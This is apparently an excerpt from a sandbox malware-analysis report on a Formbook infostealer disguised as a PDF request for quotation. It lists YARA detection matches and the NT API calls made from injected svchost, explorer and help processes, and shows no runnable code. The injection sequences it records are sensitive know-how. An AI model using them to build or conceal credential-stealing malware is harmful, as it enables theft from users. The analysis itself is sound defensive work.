          Source: 00000002.00000002.2399244846.0000000000950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.2399244846.0000000000950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.2399244846.0000000000950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.4769894181.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.4769894181.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.4769894181.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.4776081741.0000000008811000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 00000005.00000002.4770304327.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.4770304327.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.4770304327.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.2398790786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.2398790786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.2398790786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: RFQ PC25-1301 Product Specifications_PDF.exe PID: 2940, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: svchost.exe PID: 6444, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
          Source: Process Memory Space: help.exe PID: 5132, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: RFQ PC25-1301 Product Specifications_PDF.exeString found in binary or memory: This is a third-party compiled AutoIt script.
          Source: RFQ PC25-1301 Product Specifications_PDF.exe, 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_eb702255-2
          Source: RFQ PC25-1301 Product Specifications_PDF.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e9a3231a-8
          Source: initial sampleStatic PE information: Filename: RFQ PC25-1301 Product Specifications_PDF.exe
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A330 NtCreateFile,2_2_0041A330
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A3E0 NtReadFile,2_2_0041A3E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A460 NtClose,2_2_0041A460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A510 NtAllocateVirtualMemory,2_2_0041A510
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A32C NtCreateFile,2_2_0041A32C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A383 NtCreateFile,2_2_0041A383
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A45A NtClose,2_2_0041A45A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A50A NtAllocateVirtualMemory,2_2_0041A50A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A58A NtAllocateVirtualMemory,2_2_0041A58A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A58C NtAllocateVirtualMemory,2_2_0041A58C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272B60 NtClose,LdrInitializeThunk,2_2_03272B60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272BF0 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_03272BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272AD0 NtReadFile,LdrInitializeThunk,2_2_03272AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272F30 NtCreateSection,LdrInitializeThunk,2_2_03272F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272FB0 NtResumeThread,LdrInitializeThunk,2_2_03272FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272F90 NtProtectVirtualMemory,LdrInitializeThunk,2_2_03272F90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272FE0 NtCreateFile,LdrInitializeThunk,2_2_03272FE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_03272EA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272E80 NtReadVirtualMemory,LdrInitializeThunk,2_2_03272E80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272D30 NtUnmapViewOfSection,LdrInitializeThunk,2_2_03272D30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272D10 NtMapViewOfSection,LdrInitializeThunk,2_2_03272D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03272DF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272DD0 NtDelayExecution,LdrInitializeThunk,2_2_03272DD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03272C70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272CA0 NtQueryInformationToken,LdrInitializeThunk,2_2_03272CA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03274340 NtSetContextThread,2_2_03274340
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03273010 NtOpenDirectoryObject,2_2_03273010
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03273090 NtSetValueKey,2_2_03273090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03274650 NtSuspendThread,2_2_03274650
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032735C0 NtCreateMutant,2_2_032735C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272BA0 NtEnumerateValueKey,2_2_03272BA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272B80 NtQueryInformationFile,2_2_03272B80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272BE0 NtQueryValueKey,2_2_03272BE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272AB0 NtWaitForSingleObject,2_2_03272AB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272AF0 NtWriteFile,2_2_03272AF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032739B0 NtGetContextThread,2_2_032739B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272F60 NtCreateProcessEx,2_2_03272F60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272FA0 NtQuerySection,2_2_03272FA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272E30 NtWriteVirtualMemory,2_2_03272E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272EE0 NtQueueApcThread,2_2_03272EE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272D00 NtSetInformationFile,2_2_03272D00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03273D10 NtOpenProcessToken,2_2_03273D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03273D70 NtOpenThread,2_2_03273D70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272DB0 NtEnumerateKey,2_2_03272DB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272C00 NtQueryInformationProcess,2_2_03272C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272C60 NtCreateKey,2_2_03272C60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272CF0 NtOpenProcess,2_2_03272CF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272CC0 NtQueryVirtualMemory,2_2_03272CC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_029DA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,2_2_029DA036
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_029DA042 NtQueryInformationProcess,2_2_029DA042
          Source: C:\Windows\explorer.exeCode function: 3_2_087F9232 NtCreateFile,3_2_087F9232
          Source: C:\Windows\explorer.exeCode function: 3_2_087FAE12 NtProtectVirtualMemory,3_2_087FAE12
          Source: C:\Windows\explorer.exeCode function: 3_2_087FAE0A NtProtectVirtualMemory,3_2_087FAE0A
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532B60 NtClose,LdrInitializeThunk,5_2_03532B60
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_03532BF0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532BE0 NtQueryValueKey,LdrInitializeThunk,5_2_03532BE0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532AD0 NtReadFile,LdrInitializeThunk,5_2_03532AD0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532F30 NtCreateSection,LdrInitializeThunk,5_2_03532F30
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532FE0 NtCreateFile,LdrInitializeThunk,5_2_03532FE0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_03532EA0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532D10 NtMapViewOfSection,LdrInitializeThunk,5_2_03532D10
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532DD0 NtDelayExecution,LdrInitializeThunk,5_2_03532DD0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_03532DF0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_03532C70
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532C60 NtCreateKey,LdrInitializeThunk,5_2_03532C60
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_03532CA0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035335C0 NtCreateMutant,LdrInitializeThunk,5_2_035335C0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03534340 NtSetContextThread,5_2_03534340
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03534650 NtSuspendThread,5_2_03534650
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532B80 NtQueryInformationFile,5_2_03532B80
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532BA0 NtEnumerateValueKey,5_2_03532BA0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532AF0 NtWriteFile,5_2_03532AF0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532AB0 NtWaitForSingleObject,5_2_03532AB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532F60 NtCreateProcessEx,5_2_03532F60
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532F90 NtProtectVirtualMemory,5_2_03532F90
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532FB0 NtResumeThread,5_2_03532FB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532FA0 NtQuerySection,5_2_03532FA0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532E30 NtWriteVirtualMemory,5_2_03532E30
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532EE0 NtQueueApcThread,5_2_03532EE0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532E80 NtReadVirtualMemory,5_2_03532E80
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532D00 NtSetInformationFile,5_2_03532D00
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532D30 NtUnmapViewOfSection,5_2_03532D30
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532DB0 NtEnumerateKey,5_2_03532DB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532C00 NtQueryInformationProcess,5_2_03532C00
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532CC0 NtQueryVirtualMemory,5_2_03532CC0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03532CF0 NtOpenProcess,5_2_03532CF0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03533010 NtOpenDirectoryObject,5_2_03533010
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03533090 NtSetValueKey,5_2_03533090
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035339B0 NtGetContextThread,5_2_035339B0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03533D70 NtOpenThread,5_2_03533D70
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03533D10 NtOpenProcessToken,5_2_03533D10
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_02CCA3E0 NtReadFile,5_2_02CCA3E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_02CCA330 NtCreateFile,5_2_02CCA330
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_02CCA460 NtClose,5_2_02CCA460
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_02CCA510 NtAllocateVirtualMemory,5_2_02CCA510
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_02CCA383 NtCreateFile,5_2_02CCA383
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_02CCA32C NtCreateFile,5_2_02CCA32C
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_02CCA45A NtClose,5_2_02CCA45A
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_02CCA58C NtAllocateVirtualMemory,5_2_02CCA58C
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_02CCA58A NtAllocateVirtualMemory,5_2_02CCA58A
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_02CCA50A NtAllocateVirtualMemory,5_2_02CCA50A
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03269BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,5_2_03269BAF
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0326A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,5_2_0326A036
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03269BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_03269BB2
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0326A042 NtQueryInformationProcess,5_2_0326A042
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AAD5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_00AAD5EB
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AA1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00AA1201
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AAE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00AAE8F6
          Source: RFQ PC25-1301 Product Specifications_PDF.exe, 00000000.00000003.2332247044.0000000003AF3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQ PC25-1301 Product Specifications_PDF.exe
          Source: RFQ PC25-1301 Product Specifications_PDF.exe, 00000000.00000003.2333254496.0000000003C9D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQ PC25-1301 Product Specifications_PDF.exe
          Source: RFQ PC25-1301 Product Specifications_PDF.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.2399303548.0000000002990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.2399303548.0000000002990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.2399303548.0000000002990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.2341141720.0000000000990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.2341141720.0000000000990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.2341141720.0000000000990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.2399244846.0000000000950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.2399244846.0000000000950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.2399244846.0000000000950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.4769894181.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.4769894181.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.4769894181.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.4776081741.0000000008811000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
